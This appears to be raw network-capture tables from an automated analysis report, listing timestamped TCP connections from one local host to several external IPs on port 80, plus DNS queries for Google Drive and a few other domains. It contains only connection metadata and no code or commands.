                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.430444002 CEST4983580192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.430464029 CEST8049835172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:18.430651903 CEST4983580192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:19.660912991 CEST4983580192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:20.678364038 CEST4983680192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:20.773170948 CEST8049836172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:20.773448944 CEST4983680192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:20.778458118 CEST4983680192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:20.872987986 CEST8049836172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:21.046061993 CEST8049836172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:21.046648026 CEST8049836172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:21.046824932 CEST4983680192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:21.048257113 CEST4983680192.168.11.20172.67.177.220
                                                                                                                                                                                                                        Oct 23, 2024 18:56:21.143003941 CEST8049836172.67.177.220192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:26.168715954 CEST4983780192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:26.263777018 CEST8049837104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:26.264157057 CEST4983780192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:26.271603107 CEST4983780192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:26.366787910 CEST8049837104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:26.821609020 CEST8049837104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:26.821675062 CEST8049837104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:26.821682930 CEST8049837104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:26.821968079 CEST8049837104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:26.822030067 CEST4983780192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:26.822096109 CEST4983780192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:27.784184933 CEST4983780192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:28.801655054 CEST4983880192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:28.896055937 CEST8049838104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:28.896244049 CEST4983880192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:28.903660059 CEST4983880192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:28.997958899 CEST8049838104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:29.477283955 CEST8049838104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:29.477375031 CEST8049838104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:29.477386951 CEST8049838104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:29.477515936 CEST4983880192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:29.477634907 CEST8049838104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:29.477737904 CEST4983880192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:30.408613920 CEST4983880192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:31.426105976 CEST4983980192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:31.520256996 CEST8049839104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:31.520425081 CEST4983980192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:31.527971029 CEST4983980192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:31.528033018 CEST4983980192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:31.622320890 CEST8049839104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:31.622402906 CEST8049839104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:31.622533083 CEST8049839104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:31.622558117 CEST8049839104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:31.622581959 CEST8049839104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:31.622664928 CEST8049839104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:31.622693062 CEST8049839104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:32.102612972 CEST8049839104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:32.102679968 CEST8049839104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:32.102724075 CEST8049839104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:32.102884054 CEST4983980192.168.11.20104.21.64.124
                                                                                                                                                                                                                        Oct 23, 2024 18:56:32.102912903 CEST8049839104.21.64.124192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:07.871723890 CEST4984980192.168.11.2013.248.169.48
                                                                                                                                                                                                                        Oct 23, 2024 18:57:07.973710060 CEST804984913.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:07.973905087 CEST4984980192.168.11.2013.248.169.48
                                                                                                                                                                                                                        Oct 23, 2024 18:57:07.981944084 CEST4984980192.168.11.2013.248.169.48
                                                                                                                                                                                                                        Oct 23, 2024 18:57:08.083143950 CEST804984913.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:08.083863974 CEST804984913.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:08.084012985 CEST4984980192.168.11.2013.248.169.48
                                                                                                                                                                                                                        Oct 23, 2024 18:57:09.494282007 CEST4984980192.168.11.2013.248.169.48
                                                                                                                                                                                                                        Oct 23, 2024 18:57:09.595524073 CEST804984913.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:10.511672974 CEST4985080192.168.11.2013.248.169.48
                                                                                                                                                                                                                        Oct 23, 2024 18:57:10.616141081 CEST804985013.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:10.616327047 CEST4985080192.168.11.2013.248.169.48
                                                                                                                                                                                                                        Oct 23, 2024 18:57:10.623800039 CEST4985080192.168.11.2013.248.169.48
                                                                                                                                                                                                                        Oct 23, 2024 18:57:10.724644899 CEST804985013.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:10.725019932 CEST804985013.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:10.725194931 CEST4985080192.168.11.2013.248.169.48
                                                                                                                                                                                                                        Oct 23, 2024 18:57:12.134294987 CEST4985080192.168.11.2013.248.169.48
                                                                                                                                                                                                                        Oct 23, 2024 18:57:12.235156059 CEST804985013.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:13.151746988 CEST4985180192.168.11.2013.248.169.48
                                                                                                                                                                                                                        Oct 23, 2024 18:57:13.254700899 CEST804985113.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:13.254955053 CEST4985180192.168.11.2013.248.169.48
                                                                                                                                                                                                                        Oct 23, 2024 18:57:13.262542009 CEST4985180192.168.11.2013.248.169.48
                                                                                                                                                                                                                        Oct 23, 2024 18:57:13.262624979 CEST4985180192.168.11.2013.248.169.48
                                                                                                                                                                                                                        Oct 23, 2024 18:57:13.364094973 CEST804985113.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:13.364145041 CEST804985113.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:13.364178896 CEST804985113.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:13.364245892 CEST804985113.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:13.364301920 CEST804985113.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:13.364336014 CEST804985113.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:13.364494085 CEST804985113.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:15.791840076 CEST4985280192.168.11.2013.248.169.48
                                                                                                                                                                                                                        Oct 23, 2024 18:57:15.894490957 CEST804985213.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:15.894665003 CEST4985280192.168.11.2013.248.169.48
                                                                                                                                                                                                                        Oct 23, 2024 18:57:15.899660110 CEST4985280192.168.11.2013.248.169.48
                                                                                                                                                                                                                        Oct 23, 2024 18:57:16.000868082 CEST804985213.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:16.002032995 CEST804985213.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:16.002116919 CEST804985213.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:16.002327919 CEST4985280192.168.11.2013.248.169.48
                                                                                                                                                                                                                        Oct 23, 2024 18:57:16.004151106 CEST4985280192.168.11.2013.248.169.48
                                                                                                                                                                                                                        Oct 23, 2024 18:57:16.105412960 CEST804985213.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:24.085489988 CEST4985380192.168.11.2062.149.128.45
                                                                                                                                                                                                                        Oct 23, 2024 18:57:24.278438091 CEST804985362.149.128.45192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:24.278641939 CEST4985380192.168.11.2062.149.128.45
                                                                                                                                                                                                                        Oct 23, 2024 18:57:24.283668041 CEST4985380192.168.11.2062.149.128.45
                                                                                                                                                                                                                        Oct 23, 2024 18:57:24.477386951 CEST804985362.149.128.45192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:24.477447987 CEST804985362.149.128.45192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:24.477490902 CEST804985362.149.128.45192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:24.477534056 CEST804985362.149.128.45192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:24.477566957 CEST804985362.149.128.45192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:24.477654934 CEST4985380192.168.11.2062.149.128.45
                                                                                                                                                                                                                        Oct 23, 2024 18:57:24.477891922 CEST4985380192.168.11.2062.149.128.45
                                                                                                                                                                                                                        Oct 23, 2024 18:57:24.479846001 CEST4985380192.168.11.2062.149.128.45
                                                                                                                                                                                                                        Oct 23, 2024 18:57:24.672791958 CEST804985362.149.128.45192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:29.492074966 CEST4985480192.168.11.2013.248.169.48
                                                                                                                                                                                                                        Oct 23, 2024 18:57:29.593666077 CEST804985413.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:29.593825102 CEST4985480192.168.11.2013.248.169.48
                                                                                                                                                                                                                        Oct 23, 2024 18:57:29.601295948 CEST4985480192.168.11.2013.248.169.48
                                                                                                                                                                                                                        Oct 23, 2024 18:57:29.701899052 CEST804985413.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:29.702404976 CEST804985413.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:29.702584982 CEST4985480192.168.11.2013.248.169.48
                                                                                                                                                                                                                        Oct 23, 2024 18:57:31.114661932 CEST4985480192.168.11.2013.248.169.48
                                                                                                                                                                                                                        Oct 23, 2024 18:57:31.217778921 CEST804985413.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:32.132134914 CEST4985580192.168.11.2013.248.169.48
                                                                                                                                                                                                                        Oct 23, 2024 18:57:32.234544039 CEST804985513.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:32.234752893 CEST4985580192.168.11.2013.248.169.48
                                                                                                                                                                                                                        Oct 23, 2024 18:57:32.242856979 CEST4985580192.168.11.2013.248.169.48
                                                                                                                                                                                                                        Oct 23, 2024 18:57:32.344229937 CEST804985513.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:32.344563007 CEST804985513.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:32.344731092 CEST4985580192.168.11.2013.248.169.48
                                                                                                                                                                                                                        Oct 23, 2024 18:57:33.754762888 CEST4985580192.168.11.2013.248.169.48
                                                                                                                                                                                                                        Oct 23, 2024 18:57:33.855812073 CEST804985513.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:34.772193909 CEST4985680192.168.11.2013.248.169.48
                                                                                                                                                                                                                        Oct 23, 2024 18:57:34.873578072 CEST804985613.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:34.873774052 CEST4985680192.168.11.2013.248.169.48
                                                                                                                                                                                                                        Oct 23, 2024 18:57:34.881376982 CEST4985680192.168.11.2013.248.169.48
                                                                                                                                                                                                                        Oct 23, 2024 18:57:34.881460905 CEST4985680192.168.11.2013.248.169.48
                                                                                                                                                                                                                        Oct 23, 2024 18:57:34.981895924 CEST804985613.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:34.981933117 CEST804985613.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:34.981942892 CEST804985613.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:34.982114077 CEST804985613.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:34.982234955 CEST804985613.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:34.982362032 CEST804985613.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:34.983531952 CEST804985613.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:37.412287951 CEST4985780192.168.11.2013.248.169.48
                                                                                                                                                                                                                        Oct 23, 2024 18:57:37.515085936 CEST804985713.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:37.515407085 CEST4985780192.168.11.2013.248.169.48
                                                                                                                                                                                                                        Oct 23, 2024 18:57:37.520389080 CEST4985780192.168.11.2013.248.169.48
                                                                                                                                                                                                                        Oct 23, 2024 18:57:37.621463060 CEST804985713.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:37.622842073 CEST804985713.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:37.622885942 CEST804985713.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:37.623172045 CEST4985780192.168.11.2013.248.169.48
                                                                                                                                                                                                                        Oct 23, 2024 18:57:37.625180960 CEST4985780192.168.11.2013.248.169.48
                                                                                                                                                                                                                        Oct 23, 2024 18:57:37.726613998 CEST804985713.248.169.48192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:42.630040884 CEST4985880192.168.11.20162.0.231.203
                                                                                                                                                                                                                        Oct 23, 2024 18:57:42.790651083 CEST8049858162.0.231.203192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:42.790844917 CEST4985880192.168.11.20162.0.231.203
                                                                                                                                                                                                                        Oct 23, 2024 18:57:42.798265934 CEST4985880192.168.11.20162.0.231.203
                                                                                                                                                                                                                        Oct 23, 2024 18:57:42.959322929 CEST8049858162.0.231.203192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:28.972285986 CEST8049870185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:28.972397089 CEST8049870185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:28.972409964 CEST8049870185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:28.972553968 CEST4987080192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:58:30.289815903 CEST4987080192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:58:31.307132006 CEST4987180192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:58:31.503833055 CEST8049871185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:31.504009008 CEST4987180192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:58:31.511482000 CEST4987180192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:58:31.708067894 CEST8049871185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:31.708153009 CEST8049871185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:31.708162069 CEST8049871185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:31.708352089 CEST4987180192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:58:33.023583889 CEST4987180192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:58:34.041023016 CEST4987280192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:58:34.238210917 CEST8049872185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:34.238428116 CEST4987280192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:58:34.246052980 CEST4987280192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:58:34.246110916 CEST4987280192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:58:34.442811966 CEST8049872185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:34.443036079 CEST8049872185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:34.443043947 CEST8049872185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:34.443314075 CEST8049872185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:34.443322897 CEST8049872185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:34.443332911 CEST8049872185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:34.443490028 CEST4987280192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:58:35.757244110 CEST4987280192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:58:36.774754047 CEST4987380192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:58:36.967714071 CEST8049873185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:36.967988968 CEST4987380192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:58:36.972995043 CEST4987380192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:58:37.165986061 CEST8049873185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:37.166337967 CEST8049873185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:37.166614056 CEST8049873185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:37.166738987 CEST8049873185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:37.166871071 CEST4987380192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:58:37.166883945 CEST8049873185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:37.166932106 CEST8049873185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:37.167144060 CEST4987380192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:58:37.170315981 CEST4987380192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:58:37.362822056 CEST8049873185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:42.179903030 CEST4987480192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:42.274044991 CEST8049874172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:42.274260998 CEST4987480192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:42.281696081 CEST4987480192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:42.375658989 CEST8049874172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:42.608000994 CEST8049874172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:42.608059883 CEST8049874172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:42.608110905 CEST8049874172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:42.608160973 CEST8049874172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:42.608203888 CEST8049874172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:42.608246088 CEST8049874172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:42.608278990 CEST8049874172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:42.608316898 CEST8049874172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:42.608481884 CEST4987480192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:42.608481884 CEST4987480192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:42.608481884 CEST4987480192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:43.786902905 CEST4987480192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:44.804322958 CEST4987580192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:44.898863077 CEST8049875172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:44.899074078 CEST4987580192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:44.906498909 CEST4987580192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:45.000824928 CEST8049875172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:45.272495985 CEST8049875172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:45.272557974 CEST8049875172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:45.272607088 CEST8049875172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:45.272654057 CEST8049875172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:45.272697926 CEST8049875172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:45.272739887 CEST8049875172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:45.272773027 CEST8049875172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:45.272825956 CEST4987580192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:45.272965908 CEST8049875172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:45.273000956 CEST4987580192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:45.273000956 CEST4987580192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:45.273160934 CEST4987580192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:46.411290884 CEST4987580192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.428760052 CEST4987680192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.523351908 CEST8049876172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.523616076 CEST4987680192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.531887054 CEST4987680192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.531953096 CEST4987680192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.626652956 CEST8049876172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.626694918 CEST8049876172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.626811981 CEST8049876172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.627008915 CEST8049876172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.627052069 CEST8049876172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.627079964 CEST8049876172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.627151966 CEST8049876172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.875664949 CEST8049876172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.875766993 CEST8049876172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.875781059 CEST8049876172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.875791073 CEST8049876172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.875801086 CEST8049876172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.875902891 CEST8049876172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.875914097 CEST8049876172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.875961065 CEST4987680192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.875961065 CEST4987680192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.876131058 CEST4987680192.168.11.20172.67.148.133
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                                                                                                        Oct 23, 2024 18:55:24.816339016 CEST53505331.1.1.1192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:45.000207901 CEST5991753192.168.11.201.1.1.1
                                                                                                                                                                                                                        Oct 23, 2024 18:55:45.132436991 CEST53599171.1.1.1192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:59.308197021 CEST5241553192.168.11.201.1.1.1
                                                                                                                                                                                                                        Oct 23, 2024 18:55:59.555155039 CEST53524151.1.1.1192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:12.695924997 CEST6228053192.168.11.201.1.1.1
                                                                                                                                                                                                                        Oct 23, 2024 18:56:12.803216934 CEST53622801.1.1.1192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:26.052464962 CEST5224653192.168.11.201.1.1.1
                                                                                                                                                                                                                        Oct 23, 2024 18:56:26.167007923 CEST53522461.1.1.1192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:39.721496105 CEST5412053192.168.11.201.1.1.1
                                                                                                                                                                                                                        Oct 23, 2024 18:56:39.928355932 CEST53541201.1.1.1192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:53.046901941 CEST5807153192.168.11.201.1.1.1
                                                                                                                                                                                                                        Oct 23, 2024 18:56:53.675441027 CEST53580711.1.1.1192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:07.543816090 CEST6332853192.168.11.201.1.1.1
                                                                                                                                                                                                                        Oct 23, 2024 18:57:07.869746923 CEST53633281.1.1.1192.168.11.20
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 23, 2024 18:52:49.494760036 CEST | 192.168.11.20 | 1.1.1.1 | 0x586c | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:52:50.082896948 CEST | 192.168.11.20 | 1.1.1.1 | 0xe38 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:53:26.863593102 CEST | 192.168.11.20 | 1.1.1.1 | 0x1ee0 | Standard query (0) | www.caprinaday.net | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:53:42.635442972 CEST | 192.168.11.20 | 1.1.1.1 | 0x3cd0 | Standard query (0) | www.how2.guru | A (IP address) | IN (0x0001) | false
